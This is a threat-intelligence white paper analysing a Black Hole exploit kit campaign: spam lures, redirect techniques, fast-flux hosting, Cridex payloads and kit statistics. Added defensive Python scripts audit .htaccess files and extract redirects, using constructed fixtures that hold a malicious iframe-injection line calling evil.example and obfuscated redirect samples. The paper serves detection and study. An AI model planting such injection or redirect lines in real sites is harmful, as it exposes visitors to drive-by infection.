Exploring the Black Hole Exploit Kit
Updated December 20, 2011
Internet Identity Threat Intelligence Department
12/29/11 Page 1/20
Summary

The Black Hole exploit kit is a web application designed to propagate malware and to monitor the resulting infections. The kit provides administrative features that let operators watch infection statistics in real time, as well as tools to configure landing pages and repack malicious payloads to evade antivirus detection. Typically, victims are lured by spam to malicious or compromised websites, from which Black Hole launches a variety of attacks against common browser-plugin vulnerabilities in Java, Adobe Reader, and Flash.

The Threat Intel team gained access to and monitored a Black Hole kit operating in the wild. Through the kit's administration panel, analysts identified the referrers distributed via spam emails, the landing pages used to initiate the exploits, and the malicious binaries dropped onto victim machines. [1] This white paper summarizes the findings.

[1] The Black Hole exploit kit labels URLs that redirect victims to its malicious landing pages as "referers".
Forum Activity

The user Legacy on the forum Damagelab.org advertised the original version of the Black Hole Exploit Kit, v beta, on 02 September. Legacy listed three individuals for potential clients to contact:

Sales: Legacy (ICQ)
Program Support: Paunch (ICQ)
Team Lead: Naron (ICQ)

Figure 1 - Legacy's original post announcing release of Black Hole exploit kit

Unlike other exploit kits, the source code for Black Hole is not for sale. Instead, potential clients lease the kit under licenses priced at $1,500 for one year, $1,000 for six months, or $700 for three months. It is also possible to rent the kit hosted on the author's server for $500 per month or $200 per week.

The Black Hole exploit kit has seen multiple updates since its original release. In a post dated 30 November 2011 on the forum Exploit.in, the user Paunch announced the most recent release v.

Figure 2 - Paunch announcing the latest updates to BH Kit (Java Rhino exploit among others)
Spam

All lures observed were initially sent out in spam campaigns generated by the Cutwail botnet. Each spam message contained a URL that led to a compromised webpage. Such URLs are called redirectors or referers. We observed three different redirection techniques that led to this particular Black Hole exploit kit:

1) .htaccess 404 rewrite
2) PHP script that loads an iframe
3) JavaScript function that evals to a window.location redirect

.htaccess 404 rewrite

Using an .htaccess rewrite technique, the criminal appends malicious JavaScript to the server's 404 response page. That code writes an iframe into the page, which tells the browser to load the exploit kit. The benefit of this technique is that the attacker has an effectively unlimited number of lure URLs, since every 404 response from the hacked website returns the appended JavaScript; the lure does not need to point at any file that actually exists. More information and examples of an infected .htaccess file can be found on the Sucuri Blog. [2]

Figure 3 - 404 page with malicious JavaScript appended

[2] .htaccess info: htaccess-attacks-part-1.html
Two distinct campaigns, one impersonating Bank of America and the other the IRS, were observed using the .htaccess 404 rewrite technique. [3] In the Bank of America spam campaign, emails appeared to be sent from 'alert <.alert@bankofamerica.com>'. Listed below are examples of the subject headers observed:

Bank of America: Account CLOSED
Bank of America: Action required
Bank of America: Account CLOSED
Bank of America: Bill Payment CANCELED
Bank of America: Unauthorized charges

Figure 4 - Bank of America lure

[3] StopMalvertising.com analysis of the Bank of America spam campaign: scams/bank-of-america-account-alert-leads-to-blackhole-exploit-kit.html
In this attack, the lures contained links to non-existent PDF files on the server:

hxxp://aracelektronik.com/8239epeoiq88534.pdf
hxxp://brandonwjohnson.com/8239epeoiq89534.pdf
hxxp://dafitson.com/8239epeoiq89534.pdf
hxxp://easterncuisinewales.com/8238epeoiq89534.pdf
hxxp://guiameloncorp.com/8239epeoiq89634.pdf
hxxp://kismetindianrestaurant.co.uk/82e9epeoiq89534.pdf
hxxp://masteryao.com/8239epeoiq89534.pdf
hxxp://nicksvac.com/8289epeoiq89534.pdf
hxxp://sanseverocommunity.com/8239epeoiq89534.pdf
hxxp://thewebsitedesignpeople.co.uk/3239epeoiq86534.pdf
hxxp://

By design, the server then returned an altered 404 page containing the obfuscated JavaScript, which eval'ed to an iframe in the browser:

Figure 5 - Deobfuscated JavaScript with an iframe to exploit page
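A site owner checking for the .htaccess tampering described above wants to know which ErrorDocument and RewriteRule directives would turn an ordinary 404 into a redirector. The following audit script is an added example written for this page, not code from the IID paper or from the Sucuri post it cites. The two .htaccess samples are constructed: evil.example, the campaign id dbfe3a9c and the WordPress block are placeholders chosen to resemble the pattern, not data recovered from a compromised host.

```python
import re

# Constructed sample of an .htaccess file tampered with in the way described
# above; evil.example and the page value are placeholders, not data from the
# paper. Line 6 serves inline script on every 404, line 7 sends 403s off-site.
TAMPERED_HTACCESS = """\
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
# END WordPress
ErrorDocument 404 "<script>document.write('<iframe src=\\"http://evil.example/main.php?page=dbfe3a9c\\" width=1 height=1></iframe>')</script>"
ErrorDocument 403 http://evil.example/main.php?page=dbfe3a9c
"""

# Constructed benign file for comparison: a local static error page.
CLEAN_HTACCESS = """\
RewriteEngine On
ErrorDocument 404 /404.html
"""

ERRORDOC = re.compile(r"^\s*ErrorDocument\s+(\d{3})\s+(.*?)\s*$", re.I)
REWRITERULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)
REMOTE = re.compile(r"^https?://", re.I)


def audit_htaccess(text):
    """Return a list of (line_number, reason) for directives that turn error
    responses or rewrites into a redirector. Comment lines are skipped."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        m = ERRORDOC.match(line)
        if m:
            code, target = m.group(1), m.group(2)
            if target.startswith('"') or "<" in target:
                # Apache treats a quoted target as literal response text, so
                # script placed here is served to every visitor hitting the error.
                findings.append((lineno, f"ErrorDocument {code} serves inline markup/script"))
            elif REMOTE.match(target):
                # A full URL makes Apache answer with a redirect to that location.
                findings.append((lineno, f"ErrorDocument {code} redirects off-site to {target}"))
            elif target.lower().endswith((".php", ".cgi", ".pl")):
                # A script handler is not wrong by itself; it needs a manual look.
                findings.append((lineno, f"ErrorDocument {code} is handled by a script ({target}); review it"))
            continue
        m = REWRITERULE.match(line)
        if m and REMOTE.match(m.group(1)):
            findings.append((lineno, f"RewriteRule sends matching requests off-site to {m.group(1)}"))
    return findings


if __name__ == "__main__":
    for lineno, reason in audit_htaccess(TAMPERED_HTACCESS):
        print(f"line {lineno}: {reason}")
    print("clean file findings:", audit_htaccess(CLEAN_HTACCESS))
```

The check on the quoted target matters most: Apache serves a quoted ErrorDocument value as the body of the error response, so a single line in .htaccess is enough to attach the iframe to every non-existent path on the site, which is exactly why the lures above could point at PDF names that never existed. Pair the file audit with a live probe of a random non-existent path and compare the 404 body against the clean error page.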
The IRS-themed campaign functions in almost exactly the same manner. Below is an example of one such email, with the subject IRS: Fraud Alert:

Figure 6 - IRS themed lure

This campaign utilized hundreds of compromised domains as lures, including but not limited to:

hxxp://davidenocera.altervista.org/irsgov/reports/complaint/66n704bvvof
hxxp://de.yachtexport.com.pl/irsgov/reports/complaint/66n704bvvof
hxxp://digofone.com/irsgov/reports/complaint/65dhwptnb49s
hxxp://foto1.hu/irsgov/reports/complaint/66n704bvvof
hxxp://freebusinesscardtemplates.com.au/irsgov/reports/complaint/3rfhpmxubgib98
hxxp://freshmodels.pl/irsgov/reports/complaint/66n704hj399
hxxp://galadhwen.com/irsgov/reports/complaint/4d5623a04sf3
hxxp://gruppoaversente.it/irsgov/reports/complaint/no304ind893
hxxp://gruppoaversente.it/irsgov/reports/complaint/vad5nhv6w3doh
hxxp://helyitermek.com/irsgov/reports/complaint/kl0929naike9
hxxp://hostelinflorence.com/irsgov/reports/complaint/f35704bvvof
Below are the Black Hole campaigns associated with this technique:

Campaign | Black Hole URL
dbfe c | koiwoeqwcut.com/main.php?page=dbfe c
502c1fba e | domainsecurityvultest.in/main.php?page=502c1fba e
502c1fba e | www123.pandasecuritycheck.com/main.php?page=502c1fba e

Campaign dbfe c impersonated Bank of America and 502c1fba e was IRS themed.

PHP Script to iframe

In the second technique, malicious PHP scripts were placed on compromised websites. While no spam samples were identified, the administration panel of the Black Hole exploit kit showed the following lures:

hxxp://fnrtop.com/adinfo.php
hxxp://lomaintech.com/adinfo.php
hxxp://rawmercurymedia.com/adinfo.php
hxxp://rendermode.com/adinfo.php
hxxp://paradisewebhost.com/adinfo.php

The following HTML code (an iframe to the Black Hole kit) loads into the browser of victims who click one of the above URLs:

Figure 7 - Response content of adinfo.php redirector

Below are the Black Hole campaigns associated with this technique:

Campaign | Domain
68dfc2dfc10659c4 | statistic-countervisitors.net/main.php?page=68dfc2dfc10659c4
c f49d07 | statistic-countervisitors.com/main.php?page=c f49d07
dfb886473afec374 | usa-server05.com/main.php?page=dfb886473afec374
095252abda | media-googlestat743.com/main.php?page=095252abda
ae5b527f10c01793 | media-googlestat743.net/main.php?page=ae5b527f10c
window.location Redirect

The third technique, the window.location redirect, utilized hundreds of compromised domains as redirectors in a variety of spam emails. Many of the domains were also used in other spam campaigns as hosting platforms for other redirectors. Below is a personalized spam sample sent on 07 December 2011:

Figure 8 - Spam sample from December 7th

All personally identifiable information has been blotted out of the screenshot. Redirectors had the following format:

hxxp://domain.tld/invoiceid-[0-9]{5}.html

hxxp://bgoharbin.com/invoiceid html
hxxp://capital-humain.ca/invoiceid html
hxxp://neikiddo.com/invoiceid html
Another wave of emails, sent December 13th, contained subject lines like "New Agreement for our group due December 2nd 2011." [4] The redirectors had the following format:

Z]{8}.html

hxxp://bellomo.de/njai6evm.html
hxxp://inmemoriam40-45.nl/ffcacg8g.html
hxxp://dvat.doggen-vom-alten-traum.de/e33b1h21.html
hxxp://curricolo.istruzioneferrara.it/ v.html
hxxp://admin.youmks.cba.pl/0j1mf9zd.html
hxxp://curricolo.istruzioneferrara.it/m57qr6mu.html

The HTML pages contained obfuscated JavaScript that loaded the Black Hole kit using the window.location object.

Figure 9 - JavaScript function returned by hacked page

[4] Reference to lure on Dynamoo's Blog: logs-spam.html
The browser evals this JavaScript to the following:

Figure 10 - window.location redirect code

The Black Hole campaigns associated with this technique:

Campaign | Domain
68dfc2dfc10659c4 | cms-wideopendns.com/main.php?page=68dfc2dfc10659c4
68dfc2dfc10659c4 | domainsecurityvultest.in/main.php?page=68dfc2dfc10659c4
095252abda | checkmeforsecuryty.in/main.php?page=095252abda

Current status of the Black Hole domains

Domain | First Seen (PST) | Current Status
media-googlestat743.net | 12/5/11 17:19 | SERVFAIL
statistic-countervisitors.com | 12/5/11 18:06 | SERVFAIL
statistic-countervisitors.net | 12/7/11 1:55 | SERVFAIL
usa-server05.com | 12/7/11 4:51 | SERVFAIL
media-googlestat743.com | 12/7/11 10:09 | NXDOMAIN
koiwoeqwcut.com | 12/8/11 15:09 | SERVFAIL
checkmeforsecuryty.in | 12/12/11 8:11 | SERVFAIL
domainsecurityvultest.in | 12/13/11 1:51 | NOERROR [5]
cms-wideopendns.com | 12/13/11 13:19 | SERVFAIL
www123.pandasecuritycheck.com | 12/14/11 9:39 | NOERROR
yourpandasecuritycheck.com | 12/16/11 2:56:51 | NOERROR

[5] domainsecurityvultest.in is suspended (status CLIENT HOLD). The domain uses the nameserver ns1.suspended-domain.com.
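All three redirection techniques end the same way: the victim's browser is pointed at a main.php?page=<campaign id> landing page, either through an iframe (the 404 rewrite and the adinfo.php response) or through a window.location assignment. The extractor below is an added example for this page, not code from the IID paper, and shows how an analyst can classify a captured redirector page and pull out the campaign id without executing the JavaScript; it undoes the one obfuscation it knows (String.fromCharCode) and otherwise scans statically, so a page that hides its URL behind a different encoder will come back as None. The sample pages are constructed: the adinfo.php and window.location samples reuse hosts and campaign ids from the tables above, while the 404-page sample pairs koiwoeqwcut.com with the placeholder id dbfe3a9c because the paper's id for that campaign is truncated.

```python
import re
from urllib.parse import parse_qs, urlparse

# Regexes for the three redirector forms described above.
FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")
IFRAME_SRC = re.compile(r"<iframe[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
LOCATION = re.compile(
    r"(?:window\.|document\.|top\.|self\.)?location(?:\.href)?\s*=\s*[\"']([^\"']+)[\"']", re.I)
# Black Hole landing pages in this paper share the shape main.php?page=<hex id>.
BH_LANDING = re.compile(r"/main\.php\?page=[0-9a-f]+", re.I)


def obfuscate(s):
    """Encode text as a String.fromCharCode(...) call, the obfuscation the
    decoder below reverses (used here only to build a constructed sample)."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in s) + ")"


def decode_fromcharcode(text):
    """Replace every String.fromCharCode(n,n,...) call with its decoded text so
    that URLs hidden behind it become visible to the regexes."""
    def repl(m):
        codes = [c.strip() for c in m.group(1).split(",") if c.strip()]
        return "".join(chr(int(c)) for c in codes)
    return FROMCHARCODE.sub(repl, text)


def find_blackhole_redirect(content):
    """Return (technique, landing_url, campaign_id) for a redirector page, or
    None when the content carries no reference to a Black Hole landing page."""
    text = decode_fromcharcode(content)
    for technique, pattern in (("iframe", IFRAME_SRC), ("window.location", LOCATION)):
        for url in pattern.findall(text):
            if BH_LANDING.search(url):
                campaign = parse_qs(urlparse(url).query).get("page", [""])[0]
                return technique, url, campaign
    return None


# Constructed samples (see lead-in): hosts and ids for the adinfo.php and
# window.location cases come from the campaign tables; dbfe3a9c is a placeholder.
SAMPLE_404_PAGE = (
    "<html><body><h1>Not Found</h1></body></html>\n<script>document.write("
    + obfuscate('<iframe src="http://koiwoeqwcut.com/main.php?page=dbfe3a9c" '
                'width="1" height="1" style="visibility:hidden"></iframe>')
    + ")</script>"
)
SAMPLE_ADINFO = ('<html><body><iframe src="http://statistic-countervisitors.net/'
                 'main.php?page=68dfc2dfc10659c4" width="1" height="1"></iframe>'
                 '</body></html>')
SAMPLE_WINLOC = ('<script>function go(){window.location="http://cms-wideopendns.com/'
                 'main.php?page=68dfc2dfc10659c4";}go();</script>')
BENIGN_404 = "<html><body><h1>404 Not Found</h1></body></html>"

if __name__ == "__main__":
    for name, page in [("404 rewrite", SAMPLE_404_PAGE), ("adinfo.php", SAMPLE_ADINFO),
                       ("window.location", SAMPLE_WINLOC), ("benign", BENIGN_404)]:
        print(f"{name}: {find_blackhole_redirect(page)}")
```

The campaign id is the value worth keeping from each redirector: it is what the kit's admin panel keys its statistics on, so grouping redirectors by that id reproduces the campaign tables above from captured pages alone, independent of which compromised domain each lure used.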
Black Hole exploit kit Infrastructure

Analysis confirmed that this Black Hole kit was hosted at a fast-flux bullet-proof hosting provider. The short TTL, multiple A records, and distributed nameservers are indicators of a fast-flux botnet. A passive DNS lookup revealed 95 unique IPs for the month of December 2011.

Figure 11 - Query results from the authoritative nameserver

Figure 12 - Query results from our passive DNS database
Six of the 95 IPs were randomly selected for closer analysis:

Hostname | Country | ASN | ISP
hdn1.deu.da.uu.net | DE | 702 | Verizon Deutschland
pcs.intercable.net | MX | | Television Internacional
dynamicip.rima-tde.net | ES | 3352 | Telefonica España
cpe.net.cable.rogers.com | CA | 812 | Rogers Cable
pool.mediaways.net | DE | 6805 | Telefonica o2 Deutschland
cm telecable.es | ES | | TeleCable

All of the IPs are residential broadband accounts spread across the globe, a strong indicator of a botnet. The evidence clearly shows that the Black Hole kit is hosted behind a fast-flux botnet. In short, the kit is hiding behind a botnet of proxy servers, and those proxy servers are infected consumer computers. The diagram below shows how the whole operation works. Note that the Black Hole exploit kit sits on a criminal server behind the fast-flux proxy network.

Figure 13: Infrastructure of the Black Hole exploit kit
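The indicators used above (a short TTL, many A records, IPs scattered across ASNs and countries, and reverse-DNS names that look like consumer broadband) can be turned into a repeatable score. The following is an added example for this page, not IID's own tooling: it scores one answer set against those indicators and measures churn between two answer sets, which is what repeated queries of a fast-flux name expose. The answer sets are constructed: hostnames, countries and ASNs follow the table above, but the IPs are RFC 5737 documentation addresses, the 300-second TTL is assumed, and the two hosts whose ASN the paper does not give are assigned private ASNs 64500 and 64501. The residential heuristic is a simple token match and will miss names such as hdn1.deu.da.uu.net that carry no such token.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Answer:
    """One A record from the authoritative server, enriched with reverse DNS
    and ASN/country data (in practice from whois or a passive DNS service)."""
    ip: str
    hostname: str
    ttl: int
    asn: int
    country: str


# Heuristic: consumer-broadband reverse DNS tends to carry tokens like these.
RESIDENTIAL_PREFIXES = ("dyn", "pool", "cpe", "dsl", "ppp", "dhcp", "dial", "cust")


def looks_residential(hostname):
    """True when a reverse-DNS name looks like a consumer broadband account."""
    tokens = re.split(r"[.\-]", hostname.lower())
    return any(t.startswith(RESIDENTIAL_PREFIXES) or t == "cm" or "cable" in t
               for t in tokens)


def fast_flux_indicators(answers, max_ttl=600, min_ips=5, min_asns=3, min_countries=2):
    """Score one answer set against the indicators the paper relies on: a short
    TTL, many A records, and IPs scattered across ASNs, countries and
    residential networks. Returns (indicators dict, number that fired)."""
    indicators = {
        "short_ttl": min(a.ttl for a in answers) <= max_ttl,
        "many_a_records": len({a.ip for a in answers}) >= min_ips,
        "many_asns": len({a.asn for a in answers}) >= min_asns,
        "many_countries": len({a.country for a in answers}) >= min_countries,
        # at least half of the reverse names look like broadband accounts
        "mostly_residential": sum(looks_residential(a.hostname) for a in answers) * 2 >= len(answers),
    }
    return indicators, sum(indicators.values())


def ip_churn(previous, current):
    """Fraction of the IP set replaced between two answer sets (Jaccard
    distance); repeated queries of a fast-flux name show high churn."""
    a, b = {x.ip for x in previous}, {x.ip for x in current}
    return 1 - len(a & b) / len(a | b)


def is_likely_fast_flux(answers, threshold=3):
    return fast_flux_indicators(answers)[1] >= threshold


# Constructed answer set modelled on the six hosts in the table above (IPs,
# TTL and the ASNs 64500/64501 are placeholders, see lead-in).
FLUX_ANSWERS = [
    Answer("192.0.2.10", "hdn1.deu.da.uu.net", 300, 702, "DE"),
    Answer("192.0.2.11", "pcs.intercable.net", 300, 64500, "MX"),
    Answer("192.0.2.12", "dynamicip.rima-tde.net", 300, 3352, "ES"),
    Answer("192.0.2.13", "cpe.net.cable.rogers.com", 300, 812, "CA"),
    Answer("192.0.2.14", "pool.mediaways.net", 300, 6805, "DE"),
    Answer("192.0.2.15", "cm.telecable.es", 300, 64501, "ES"),
]
# Constructed answer set for an ordinary site hosted in one data centre.
STATIC_ANSWERS = [
    Answer("198.51.100.7", "www1.example.net", 86400, 64496, "US"),
    Answer("198.51.100.8", "www2.example.net", 86400, 64496, "US"),
]

if __name__ == "__main__":
    for name, answers in (("flux", FLUX_ANSWERS), ("static", STATIC_ANSWERS)):
        indicators, score = fast_flux_indicators(answers)
        verdict = "fast-flux" if is_likely_fast_flux(answers) else "normal"
        print(name, score, verdict, indicators)
```

Content delivery networks also answer with short TTLs and several A records, so the ASN, country and residential indicators carry the real weight: a CDN's addresses sit in a handful of provider ASNs with data-centre reverse names, whereas the six hosts above are all on different consumer ISPs. Feeding each successive answer set into ip_churn over a day turns the paper's 95-unique-IPs observation into a number that can be alerted on.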
Malware (Payloads)

Analysis shows that all but one of the samples listed below are the same binary, slightly altered by basic packer obfuscation. These binaries are all variants of the Cridex trojan. [6][7]

MD5 | Description | First Seen | VT Score
bf391e746529f4f87098a20f1 | Cridex | 12/13 | 1/
ecbf563d13cccbc8cc6de0d9 | Cridex | 12/12 | 5/
d1dee4c981b64fb9342a66ba81bb | Cridex | 12/7 | 2/43
27e403df66918fbbd bacd8492 | Cridex | 12/6 | 22/43
8ff7ab0264af8ce3d551a4924d | Cridex | 12/5 | 4/43
d41d8cd98f00b204e9800998ecf8427e | Empty file | 12/5 | NA

Figure 14 - Some of the malware samples dropped

The low VirusTotal detection counts on the newer samples are the expected result of the repacking the kit offers its operators. The last entry is the MD5 of a zero-byte file, so it records a failed or empty download rather than a distinct payload.

[6] The Cridex trojan is a banking trojan designed to steal victim banking credentials.
[7] nov-11-cridex-the-hex-of-skidlo.aspx
Anti-White Hat Techniques

The criminals operating this Black Hole kit made considerable efforts to protect their investment and maximize the efficiency of their operation. They hosted the exploit kit at a fast-flux botnet hosting provider in order to hide it behind a proxy network (see Figure 13). They also block IPs and referers that they believe are used by white-hat researchers to track malware systems. The blocking appears to be implemented as deny directives in the .htaccess configuration, but the functionality is built directly into the Black Hole admin panel:

Figure 15 - Black List
Statistics

This section provides a glimpse into the Black Hole control panel from the vantage point of the criminal operators.

Country Statistics

Analysis of the statistics confirmed that the criminal actors were targeting only the United States, Germany, and Italy, with the primary focus on victims in the United States.

Figure 16 - Statistics based on country

For clarification, the first column is country, the second column is hits, the third column is successful exploits, and the fourth column is successful infections.
Exploit Statistics

The most commonly used exploit is the newly added Java Rhino exploit [CVE ]. Because it targets the Java plugin rather than the browser itself, this exploit works in every browser and on every operating system where a vulnerable Java runtime is installed.

Figure 17 - Exploit statistics

Browser Statistics

There were many successful exploits of Safari and Chrome, but no successful malware installs. The most vulnerable browser is Firefox with a 60% exploit rate, followed by Internet Explorer with a 40% exploit rate.

Figure 18 - Browser statistics
Operating System Statistics

The statistics panel shows that the most vulnerable and most prevalent operating system is Windows XP.

Figure 19 - Operating system statistics

Overall Statistics

The overall statistics section shows the total number of hosts infected by this Black Hole exploit kit.

Figure 20 - Overall statistics
Post-Exploit Traffic Direction

After the exploit code is run, users are forwarded to the following domains:

commercialday-net.com
jdemponedelnik.bij.pl

commercialday-net.com is suspended (domain status CLIENT HOLD) and jdemponedelnik.bij.pl appears to redirect to an Incognito exploit kit. The purpose of this traffic direction is unclear.

Figure 21 - Campaign monitoring page
Administrator Connections

Administrator connections to the exploit kit admin panel were established from the following IPs:

Country | Hostname | ISP
US | server80.it4business.ca | PEER
US | dns2.raymondvilleisd.org | VTXC
NL | N/A | LEASEWEB
US | N/A | NTT
DE | evrohoster.com | LEASEWEB
US | 8a.7.be.static.xlhost.com | XLHOST.COM
DE | N/A | LEASEWEB
MD | starnet.md | STARNET
NL | local | DEDISERV
GB | N/A | RACKSRV

Most of these IPs appear to be VPS or VPN servers.
More informationthriller INTERNET SECURITY
+ thriller INTERNET SECURITY Saturday, October 31, 2009 1:30 PM 3:00 PM Matthew 28:18-20 Website Ministry + Agenda 2 Scripture (Col 3:12-15) Prayer Internet Security Security Threats Security Protection
More informationZscaler Internet Security Frequently Asked Questions
Zscaler Internet Security Frequently Asked Questions 1 Technical FAQ PRODUCT LICENSING & PRICING How is Zscaler Internet Security Zscaler Internet Security is licensed on number of Cradlepoint devices
More informationMITB Grabbing Login Credentials
MITB Grabbing Login Credentials Original pre-login fields UID, password & site Modified pre-login fields Now with ATM details and MMN New fields added MITB malware inserted additional fields. Records them,
More informationSpam and All Things Salty: Spambot v2013
Spam and All Things Salty: Spambot v2013 Jessa dela Torre 1 and Sabrina Lei Sioting 2 1 Forward-Looking Threat Research Team 2 Threat Cleanup and Analysis Team Trend Micro, Inc., Philippines Abstract.
More informationhttp://my6.statcounter.com/project/standard/magnify.php?project_id=1613882&ip_number=3275864294
Pagina 1 di 8 My Projects My Profile Account Info Users Support Billing Upgrade User Forum Blog Logout [nicscics] Magnify User (Scie Chimiche (Chemtrails)) 16th December 2008 00:40:22 S T A T I S T I C
More informationSOLUTION CARD WHITE PAPER
WHITE PAPER Why Education is Among the Worst Affected Industries by Malware The Contradiction Between Perceived Anti-Virus Readiness and Actual Malware Infection Rates in the Education Industry About This
More informationInside Nuclear s Core: Analyzing the Nuclear Exploit Kit Infrastructure Part I
Inside Nuclear s Core: Analyzing the Nuclear Exploit Kit Infrastructure Part I By Check Point Threat Intelligence & Research Malware has different methods by which it propagates. Exploit kits (EKs) have
More informationFrom Georgia, with Love Win32/Georbot. Is someone trying to spy on Georgians?
From Georgia, with Love Win32/Georbot Is someone trying to spy on Georgians? At the beginning of the year, a curious piece of malware came to our attention. An analyst in our virus laboratory noticed that
More informationVersafe TotALL Online Fraud Protection
Versafe TotALL Online Fraud Protection Protect ALL users. From ALL malware, threat types. On ALL devices. ALL transparently to the end-user. Summary of Mobile Malware & Cross-Device Attacks Overview of
More informationApril 11, 2011. (Revision 2)
Passive Vulnerability Scanning Overview April 11, 2011 (Revision 2) Copyright 2011. Tenable Network Security, Inc. All rights reserved. Tenable Network Security and Nessus are registered trademarks of
More informationMalware, Phishing, and Cybercrime Dangerous Threats Facing the SMB State of Cybercrime
How to Protect Your Business from Malware, Phishing, and Cybercrime The SMB Security Series Malware, Phishing, and Cybercrime Dangerous Threats Facing the SMB State of Cybercrime sponsored by Introduction
More informationUnknown threats in Sweden. Study publication August 27, 2014
Unknown threats in Sweden Study publication August 27, 2014 Executive summary To many international organisations today, cyber attacks are no longer a matter of if but when. Recent cyber breaches at large
More informationState of the Web 2015: Vulnerability Report. March 2015. 2015 Menlo Security Alright Reserved
State of the Web 2015: Vulnerability Report March 2015 Motivation In February 2015, security researchers http://www.isightpartners.com/2015/02/codoso/ reported that Forbes.com had been hacked. The duration
More informationTrend Micro Incorporated Research Paper 2012. Adding Android and Mac OS X Malware to the APT Toolbox
Trend Micro Incorporated Research Paper 2012 Adding Android and Mac OS X Malware to the APT Toolbox Contents Abstract... 1 Introduction... 1 Technical Analysis... 2 Remote Access Trojan Functionality...
More informationLASTLINE WHITEPAPER. Large-Scale Detection of Malicious Web Pages
LASTLINE WHITEPAPER Large-Scale Detection of Malicious Web Pages Abstract Malicious web pages that host drive-by-download exploits have become a popular means for compromising hosts on the Internet and,
More informationSpy Eye and Carberp the new banker trojans offensive
Spy Eye and Carberp the new banker trojans offensive The common way for a wanna-be hacker to fulfill his sick aspirations is to achieve a known trojan there is a plenty on the Internet, sometimes they
More informationDefend Your Network with DNS Defeat Malware and Botnet Infections with a DNS Firewall
Defeat Malware and Botnet Infections with a DNS Firewall By 2020, 30% of Global 2000 companies will have been directly compromised by an independent group of cyberactivists or cybercriminals. How to Select
More informationPhishing Activity Trends Report. 1 st Half 2009. Committed to Wiping Out Internet Scams and Fraud
1 st Half 2009 Committed to Wiping Out Internet Scams and Fraud January June 2009 Phishing Report Scope The quarterly APWG analyzes phishing attacks reported to the APWG by its member companies, its Global
More informationLanFiltrator The "Reversed" Trojan. (Free Gobo 2) Security Through Hacking. Straight forward, no nonsense Security tool Tutorials.
SECUREIT.CO.IL Tutorial LanFiltrator Trojan Security Through Hacking LanFiltrator The "Reversed" Trojan (Free Gobo 2) Straight forward, no nonsense Security tool Tutorials SECUREIT.CO.IL SECURITY THROUGH
More informationThe Underground Economy of the Pay-Per-Install (PPI) Business
The Underground Economy of the Pay-Per-Install (PPI) Business Kevin Stevens, Security Researcher SecureWorks Counter Threat Unit (CTU) History of the PPI Business The Pay-Per-Install business model (PPI)
More informationHow To Protect Yourself From A Web Attack
Five Stages of a Web Malware Attack A guide to web attacks plus technology, tools and tactics for effective protection By Chris McCormack, Senior Product Marketing Manager Today s web attacks are extremely
More informationDr. Seltsam, oder wie ich lernte, Malware zu lieben
Dr. Seltsam, oder wie ich lernte, Malware zu lieben Matthias Schmidt schmidt@ieee.org Quid est Malware? 2 Viruses Spyware Worms Adware Malware Rootkits Trojans Keyloggers Ransomware Dialers 06/05/13 3
More informationCurrent counter-measures and responses by CERTs
Current counter-measures and responses by CERTs Jeong, Hyun Cheol hcjung@kisa.or.kr April. 2007 Contents I. Malware Trends in Korea II. Malware from compromised Web sites III. Case Study : Malware countermeasure
More informationFSOEP Web Banking & Fraud: Corporate Treasury Attacks
FSOEP Web Banking & Fraud: Corporate Treasury Attacks Your Presenters Who Are We? Tim Wainwright Managing Director Chris Salerno Senior Consultant Led 200+ penetration tests Mobile security specialist
More informationThreat Intelligence UPDATE: Cymru EIS Report. www.team- cymru.com
Threat Intelligence Group UPDATE UPDATE: SOHO Pharming A Team Cymru EIS Report Powered Page by T1eam Threat Intelligence Group of 5 C ymru s This is an update on the SOHO Pharming case we published a little
More informationIntroduction: 1. Daily 360 Website Scanning for Malware
Introduction: SiteLock scans your website to find and fix any existing malware and vulnerabilities followed by using the protective TrueShield firewall to keep the harmful traffic away for good. Moreover
More informationThe current case DNSChanger what computer users can do now
The current case DNSChanger what computer users can do now Content What happened so far? 2 What is going to happen on 8 March 2012? 2 How can I test my Internet settings? 2 On the PC 3 On the router 5
More informationPay-Per-Install The New Malware Distribution Network
Pay-Per-Install The New Malware Distribution Network Nishant Doshi, Ashwin Athalye, and Eric Chien Contents Introduction... 1 Pay-Per-Install Distribution Model... 2 Recruiting Affiliates... 4 The Payload...
More informationCurrent Threat Scenario and Recent Attack Trends
Current Threat Scenario and Recent Attack Trends Anil Sagar Additional Director Indian Computer Emergency Response Team (CERT-In) Objectives Current Cyber space Nature of cyberspace and associated risks
More informationTHE OPEN UNIVERSITY OF TANZANIA
THE OPEN UNIVERSITY OF TANZANIA Institute of Educational and Management Technologies COURSE OUTLINES FOR DIPLOMA IN COMPUTER SCIENCE 2 nd YEAR (NTA LEVEL 6) SEMESTER I 06101: Advanced Website Design Gather
More informationWeb Vulnerability Scanner by Using HTTP Method
Available Online at www.ijcsmc.com International Journal of Computer Science and Mobile Computing A Monthly Journal of Computer Science and Information Technology IJCSMC, Vol. 4, Issue. 9, September 2015,
More informationFighting Advanced Threats
Fighting Advanced Threats With FortiOS 5 Introduction In recent years, cybercriminals have repeatedly demonstrated the ability to circumvent network security and cause significant damages to enterprises.
More information